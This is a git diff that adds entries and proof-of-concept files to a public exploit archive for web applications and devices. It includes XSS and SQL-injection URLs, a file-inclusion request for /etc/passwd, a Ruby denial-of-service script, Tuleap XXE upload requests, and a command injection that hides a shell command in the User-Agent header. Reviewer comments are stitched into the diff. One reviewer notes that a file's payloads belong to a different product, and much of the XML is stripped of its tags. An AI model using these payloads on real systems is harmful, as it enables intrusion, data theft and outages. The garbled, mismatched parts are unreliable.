diff --git a/files.csv b/files.csv
index ebf68fa5a..2ccd685d7 100755
--- a/files.csv
+++ b/files.csv
@@ -31573,7 +31573,7 @@ id,file,description,date,author,platform,type,port
 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal Vulnerability",2010-12-06,Pr0T3cT10n,windows,remote,0
 35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0
 35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution ""Sandworm"" Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0
-35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Remote File Inclusion",2014-10-25,"Mauricio Correa",hardware,webapps,0
+35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"Mauricio Correa",hardware,webapps,0
 35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0
 35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0
 35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0
@@ -31594,9 +31594,29 @@ id,file,description,date,author,platform,type,port
 35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 (.wav) - Buffer Overflow",2014-10-27,metacom,windows,local,0
 35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0
 35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383
+35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass and Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
 35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80
 35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation Vulnerability",2014-10-27,"Brandon Perry",jsp,webapps,8585
 35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80
 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0
 35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,1861
 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent XSS Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,0
+35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter Cross Site Scripting Vulnerability",2010-12-07,"John Leitch",php,webapps,0
+35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro 'showflat.pl' Cross Site Scripting Vulnerability",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0
+35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 UPnP HTTP Request Remote Denial of Service Vulnerability.",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0
+35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) 'admin1.template.php' Local and Remote File Include Vulnerabilities",2010-12-09,"Marcin Ressel",php,webapps,0 +35088,platforms/php/webapps/35088.txt,"PHP State 'id' Parameter SQL Injection Vulnerability",2010-12-09,jos_ali_joe,php,webapps,0 +35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr 'id' Parameter SQL Injection Vulnerability",2010-12-09,FL0RiX,php,webapps,0 +35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection Vulnerability",2010-12-10,FL0RiX,php,webapps,0 +35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0 +35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross Site Request Forgery Vulnerability",2010-12-10,"John Leitch",multiple,remote,0 +35093,platforms/cgi/webapps/35093.txt,"BizDir v.05.10 'f_srch' Parameter Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0 +35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha 'top.php' Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 +35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0 +35096,platforms/php/webapps/35096.txt,"Joomla! 
'com_mailto' Component Multiple Cross Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0 +35097,platforms/php/webapps/35097.txt,"Joomla Redirect Component 1.5.19 'com_redirect' Local File Include Vulnerability",2010-12-13,jos_ali_joe,php,webapps,0 +35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80 +35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80 +35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80 +35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0 +35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 diff --git a/platforms/cgi/webapps/35085.txt b/platforms/cgi/webapps/35085.txt new file mode 100755 index 000000000..21d8854af --- /dev/null +++ b/platforms/cgi/webapps/35085.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45303/info + +WWWThread is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +WWWThread 5.0.8 Pro is vulnerable; other versions may also be affected. + +http://www.example.com/cgi-bin/forum/showflat.pl?Cat=&Board=forum&Number=111&page=0&view="expanded&sb=1&part=all&vc=1 \ No newline at end of file diff --git a/platforms/cgi/webapps/35093.txt b/platforms/cgi/webapps/35093.txt new file mode 100755 index 000000000..707ae84ef --- /dev/null +++ b/platforms/cgi/webapps/35093.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45342/info
+
+BizDir is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+BizDir v.05.10 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-bin/bizdir/bizdir.cgi?f_mode=srch& f_srch=&f_srch_mode=SOME&f_start_at=1
\ No newline at end of file
diff --git a/platforms/linux/remote/35095.txt b/platforms/linux/remote/35095.txt
new file mode 100755
index 000000000..4c2b7a2da
--- /dev/null
+++ b/platforms/linux/remote/35095.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/45353/info
+
+Mozilla Firefox, SeaMonkey, and Thunderbird are prone to multiple HTML-injection vulnerabilities.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+This issue is fixed in:
+
+Firefox 3.6.13
+Firefox 3.5.16
+SeaMonkey 2.0.11
+
+x-mac-farsi exploit: ?script ?alert(1)//?/script ?
\ No newline at end of file
diff --git a/platforms/multiple/dos/35086.rb b/platforms/multiple/dos/35086.rb
new file mode 100755
index 000000000..ece4fc382
--- /dev/null
+++ b/platforms/multiple/dos/35086.rb
@@ -0,0 +1,24 @@ +source: http://www.securityfocus.com/bid/45309/info + +Allegro RomPager is prone to a remote denial-of-service vulnerability. + +Successfully exploiting this issue allows remote attackers to reboot affected devices, resulting in a denial-of-service condition. + +require 'net/https' + +url = URI.parse("http://IP/") +data = nil +headers = { + "Host" => "IP", + "Authorization" => "Basic + +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +} + +res = Net::HTTP.start(url.host, url.port) do |http| + http.use_ssl = false + http.send_request("GET", url.path, data, headers) +end + +puts res.body + diff --git a/platforms/multiple/remote/35092.html b/platforms/multiple/remote/35092.html new file mode 100755 index 000000000..5547d6d32 --- /dev/null +++ b/platforms/multiple/remote/35092.html @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/45340/info + +Helix Server is prone to a cross-site request-forgery vulnerability. + +An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site. + +Helix Server 14.0.1.571 is vulnerable; other versions may also be affected. + + + + + + \ No newline at end of file diff --git a/platforms/php/webapps/35084.txt b/platforms/php/webapps/35084.txt new file mode 100755 index 000000000..b7dc2e681 --- /dev/null +++ b/platforms/php/webapps/35084.txt 
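Review bot: The first five lines of 35086.rb (`+source: http://www.securityfocus.com/bid/45309/info` through the "Successfully exploiting this issue…" paragraph) are bare advisory prose, not Ruby, so the file as archived does not parse and `ruby 35086.rb` stops with a syntax error before it reaches `require 'net/https'`. Each of those lines should carry a `#` prefix, e.g. `# source: http://www.securityfocus.com/bid/45309/info`, so the advisory text is kept as a comment and the script stays loadable. Two smaller style points in the same hunk: `require 'net/https'` is the legacy spelling and `require 'net/http'` is sufficient since the script never uses TLS; and `http.use_ssl = false` sits inside the `Net::HTTP.start` block after the session is already open, so it is a no-op there (`use_ssl` already defaults to false, and I believe current Net::HTTP raises `IOError` if the value is actually changed on a started session), so the line can simply be dropped.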
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45294/info
+
+The Twitter Feed Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Twitter Feed 0.3.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/wp-twitter-feed/magpie/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35087.txt b/platforms/php/webapps/35087.txt
new file mode 100755
index 000000000..0d044894f
--- /dev/null
+++ b/platforms/php/webapps/35087.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45312/info
+
+The 'net2ftp' program is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit these issues to obtain sensitive information; other attacks are also possible.
+
+net2ftp 0.98 stable is vulnerable; other versions may also be affected.
+
+http://www.example.com/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil
\ No newline at end of file
diff --git a/platforms/php/webapps/35088.txt b/platforms/php/webapps/35088.txt
new file mode 100755
index 000000000..ad78777a0
--- /dev/null
+++ b/platforms/php/webapps/35088.txt
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45328/info + +PHP State is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +http://www.example.com/state.php?id=37+union+select+1,2,3,4,5,6,7,concat_ws (0x3a,user(),database(),versi(),@version_compile_os),8,9,10,11- josalijoe - \ No newline at end of file diff --git a/platforms/php/webapps/35089.txt b/platforms/php/webapps/35089.txt new file mode 100755 index 000000000..7a3393946 --- /dev/null +++ b/platforms/php/webapps/35089.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45329/info + +Joomla Jeformcr is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_jeformcr&view=form&id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35090.txt b/platforms/php/webapps/35090.txt new file mode 100755 index 000000000..3f461b86d --- /dev/null +++ b/platforms/php/webapps/35090.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45333/info + +JExtensions Property Finder is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_jesectionfinder&view=sectiondetail&sf_id=[EXPLOIT] \ No newline at end of file 
diff --git a/platforms/php/webapps/35091.txt b/platforms/php/webapps/35091.txt new file mode 100755 index 000000000..95da59d90 --- /dev/null +++ b/platforms/php/webapps/35091.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/45334/info + +ManageEngine EventLog Analyzer is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +ManageEngine EventLog Analyzer 6.1 is vulnerable; other versions may also be affected. + +https://www.example.com/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E + + +https://www.example.com/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E + + +https://www.example.com/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E + + +https://www.example.com/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35094.txt b/platforms/php/webapps/35094.txt new file mode 100755 index 000000000..5819c9ac1 --- /dev/null +++ b/platforms/php/webapps/35094.txt 
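Review bot: The four PoC URLs at the end of 35091.txt (`pkg_edit.php?xml=olsrd.xml&id=…`, `pkg.php?xml=jailctl.xm…`, `status_graph.php?if=…`, `interfaces.php?if=wan…`) look like pfSense/m0n0wall web-GUI pages rather than anything in ManageEngine EventLog Analyzer, so the body of this file appears to be mismatched with its own header and with the files.csv entry for 35091 (`ManageEngine EventLog Analyzer 6.1 Multiple Cross Site Scripting Vulnerabilities`, php/webapps). I would check the file content against the cited BID 45334 before archiving it under this ID, since a PoC filed against the wrong product misleads anyone triaging either one. If the mismatch is confirmed, the fix is to the file body and the catalogue row together, not to one of them alone.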
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45343/info + +slickMsg is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +slickMsg 0.7-alpha is vulnerable; other versions may also be affected. + +http://www.example.com/slickmsg/views/Thread/display/top.php?title=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35096.txt b/platforms/php/webapps/35096.txt new file mode 100755 index 000000000..8a4b9550b --- /dev/null +++ b/platforms/php/webapps/35096.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/45356/info + +The 'com_mailto' component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +" style="xss:expression(alert(document.cookie)) +In fields: E-mail to, Sender, Your E-mail, Subject. \ No newline at end of file diff --git a/platforms/php/webapps/35097.txt b/platforms/php/webapps/35097.txt new file mode 100755 index 000000000..c8c21505d --- /dev/null +++ b/platforms/php/webapps/35097.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45364/info + +The 'com_redirect' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. + +Joomla Redirect 1.5.19 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?option=com_redirect&view=../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/35098.txt b/platforms/php/webapps/35098.txt new file mode 100755 index 000000000..f0054ce93 --- /dev/null +++ b/platforms/php/webapps/35098.txt 
@@ -0,0 +1,36 @@ +Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap +CVE: CVE-2014-7176 +Vendor: Enalean +Product: Tuleap +Affected version: 7.4.99.5 and earlier +Fixed version: 7.5 +Reported by: Jerzy Kramarz + +Details: + +SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections: + + +GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a&global_filtersubmit=Apply HTTP/1.1 +Host: 192.168.56.108 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://192.168.56.108/plugins/docman/?group_id=100 +Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96 +Connection: keep-alive + + +Note: In order to exploit this vulnerability a attacker needs to be in position to access '/plugins/docman/' URN. + + +Further details at: + +https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/ + +Copyright: +Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. + +Disclaimer: +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. 
In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. diff --git a/platforms/php/webapps/35099.txt b/platforms/php/webapps/35099.txt new file mode 100755 index 000000000..72d79cbf3 --- /dev/null +++ b/platforms/php/webapps/35099.txt 
@@ -0,0 +1,888 @@ +Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap +CVE: CVE-2014-7177 +Vendor: Enalean +Product: Tuleap +Affected version: 7.2 and earlier +Fixed version: 7.4.99.5 +Reported by: Jerzy Kramarz + +Details: + +A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability. + +Vulnerability 1: + +1) Upload a XXE using the following request: + + +POST /plugins/tracker/?group_id=102&func=create HTTP/1.1 +Host: [ip] +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://[ip]/plugins/tracker/?group_id=102&func=create +Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------25777276834778 +Content-Length: 10561 + +-----------------------------25777276834778 +Content-Disposition: form-data; name="group_id" + +102 +-----------------------------25777276834778 +Content-Disposition: form-data; name="func" + +docreate +-----------------------------25777276834778 +Content-Disposition: form-data; name="group_id_template" + +100 +-----------------------------25777276834778 +Content-Disposition: form-data; name="tracker_new_prjname" + +Commencez à taper +-----------------------------25777276834778 +Content-Disposition: form-data; name="create_mode" + +xml +-----------------------------25777276834778 +Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml" +Content-Type: text/xml + + +]> + + 123&xxe; + e123&xxe; + 123&xxe; + + + + attachment + + + + details + + A full 
description of the artifact&xxe; + + + + summary + + One line description of the artifact&xxe; + + + + cc + + + + + + status_id + + Artifact Status + + + + The artifact has been submitted&xxe; + + + The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe; + + + + + + assigned_to + + Who is in charge of solving the artifact&xxe; + + + + + + + + category_id + + Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...) + + + + severity + + How quickly the artifact must be completed + + + + + + + + + + + + + + + + + + + + + + + + + + + stage&xxe; + + Stage in the life cycle of the artifact&xxe; + + + + The artifact has just been submitted + + + The cause of the artifact has been identified and documented + + + The artifact will be worked on. + + + The artifact is being worked on. + + + Updated/Created non-software work product (e.g. documentation) is ready for review and approval. + + + Updated/Created software is ready to be included in the next build + + + Updated/Created software is in the build and is ready to enter the test phase + + + The artifact fix has been succesfully tested. It is approved and awaiting release. + + + The artifact was not accepted. + + + The artifact is closed. 
+ + + + + + + + + + + Default + The system default artifact report + + + + Results + + + + Default + Graphic Report By Default For Support Requests + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +-----------------------------25777276834778 +Content-Disposition: form-data; name="name" + +123 +-----------------------------25777276834778 +Content-Disposition: form-data; name="description" + +123 +-----------------------------25777276834778 +Content-Disposition: form-data; name="itemname" + +e123 +-----------------------------25777276834778 +Content-Disposition: form-data; name="Create" + +Créer +-----------------------------25777276834778-- + + +2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following: + + +https://[ip]/plugins/tracker/?group_id=102&tracker=11 + + +3) Using retrieved tracker number, a XXE can be trigerred by visiting the following URL: + + +https://[ip]/plugins/tracker/?tracker=11&func=admin-formElements + + +Vulnerability 2 + +1) Upload a XXE using the following request: + +< +POST /plugins/tracker/?group_id=102&func=create HTTP/1.1 +Host: [ip] +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://[ip]/plugins/tracker/?group_id=102&func=create +Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------12077103611061 +Content-Length: 25588 + +-----------------------------12077103611061 +Content-Disposition: form-data; name="group_id" + +102 +-----------------------------12077103611061 +Content-Disposition: form-data; name="func" + +docreate +-----------------------------12077103611061 
+Content-Disposition: form-data; name="group_id_template" + +100 +-----------------------------12077103611061 +Content-Disposition: form-data; name="tracker_new_prjname" + +Commencez à taper +-----------------------------12077103611061 +Content-Disposition: form-data; name="create_mode" + +xml +-----------------------------12077103611061 +Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml" +Content-Type: text/xml + + +]> + + Bugs + bug + Bugs Tracker + + + + column8 + + + + artifact_id + + Unique artifact identifier&xxe; + + + submitted_by + + User who originally submitted the artifact&xxe; + + + + + column10&xxe; + + + + last_update_date + + Date and time of the latest modification in an artifact&xxe; + + + open_date&xxe; + + Date and time for the initial artifact submission&xxe; + + + + + fieldset_1 + + fieldset_default_desc_key + + + summary + + One line description of the artifact + + + + details + + A full description of the artifact + + + + column10 + + + + severity + + Impact of the artifact on the system (Critical, Major,...) + + + + + + + + + + + + + + + + + + + + + + + + + + + + + column10 + + + + category + + Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...) + + + + + + close_date + + End Date + + + + multi_assigned_to + + Who is in charge of this artifact + + + + + + + + + + + fieldset1 + + + + column3 + + + + status_id + + Artifact Status + + + + + + + + + + + + + stage + + Stage in the life cycle of the artifact + + + + The artifact has just been submitted + + + The cause of the artifact has been identified and documented + + + The artifact will be worked on. + + + The artifact is being worked on. + + + Updated/Created non-software work product (e.g. documentation) is ready for review and approval. 
+ + + Updated/Created software is ready to be included in the next build + + + Updated/Created software is in the build and is ready to enter the test phase + + + The artifact fix has been succesfully tested. It is approved and awaiting release. + + + The artifact was not accepted. + + + The artifact is closed. + + + + + + + + column4 + + + + resolution + + The resolution field indicates what happened to the bug. + + + + + + + + + + + + + + + + column9 + + + + assigned_to + + Who is in charge of solving the artifact + + + + + + + + + + + + fieldset1 + + + + attachment + + + + + + fieldset1 + + + + cross_references + + List of items referenced by or referencing this item. + + + references + + + + + + + fieldset1 + + + + permissions_on_artifact + + Let users groups to define who can access an artifact. + + + + + platform + + + + + + + + + + + + + source + + Customer from which the request comes from. + + + + version + + Product version concerned by the bug. + + + + + + title + + Définir le titre d'un artéfact + + + + status + + Définir l'état d'un artifact + + + + + + + + + + + contributor + + Define the contributor/assignee of an artifact + + + + + + + + + + + Bugs + The system default artifact report + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Results + + + + + + + + + + Charts + Graphic Report + + + Status + Number of Artifacts by Status + + + Severity + Number of Artifacts by severity level + + + Assignment + Number of Artifacts by Assignee + + + + + + + Default + The system default artifact report + + + + + + + + + + + + + + + + + + + + Results + + + + + + + + + + + + + + 1 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +-----------------------------12077103611061 +Content-Disposition: form-data; name="name" + +Bugs +-----------------------------12077103611061 
+Content-Disposition: form-data; name="description" + +Bugs Tracker +-----------------------------12077103611061 +Content-Disposition: form-data; name="itemname" + +bug +-----------------------------12077103611061 +Content-Disposition: form-data; name="Create" + +Créer +-----------------------------12077103611061-- + + +2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following: + + +https://[ip]/plugins/tracker/?group_id=102&tracker=12 + + +3) Using retrieved tracker number and URL, a XXE can be trigerred by visiting the retrieved URL: + + +https://[ip]/plugins/tracker/?group_id=102&tracker=12 + + +Further details at: + +https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7177/ + +Copyright: +Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. + +Disclaimer: +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. \ No newline at end of file diff --git a/platforms/php/webapps/35100.txt b/platforms/php/webapps/35100.txt new file mode 100755 index 000000000..4f6b4e6ce --- /dev/null +++ b/platforms/php/webapps/35100.txt 
@@ -0,0 +1,41 @@
+Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
+CVE: CVE-2014-7178
+Vendor: Enalean
+Product: Tuleap
+Affected version: 7.4.99.5 and earlier
+Fixed version: 7.5
+Reported by: Jerzy Kramarz
+
+Details:
+
+Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() function are introducing any extra parameters that would be executed in the content of the application.
+
+This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below.
+
+After registering with the application and sending a request similar to the one below the vulnerability can be triggered:
+
+
+GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
+Host: [IP]
+User-Agent: M" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://[IP]/svn/?group_id=102
+Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95; TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
+Connection: keep-alive
+Cache-Control: max-age=0
+
+
+Note: In order to exploit this vulnerability a user needs to be in position to see SVN repository.
+
+
+Further details at:
+
+https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7178/
+
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+
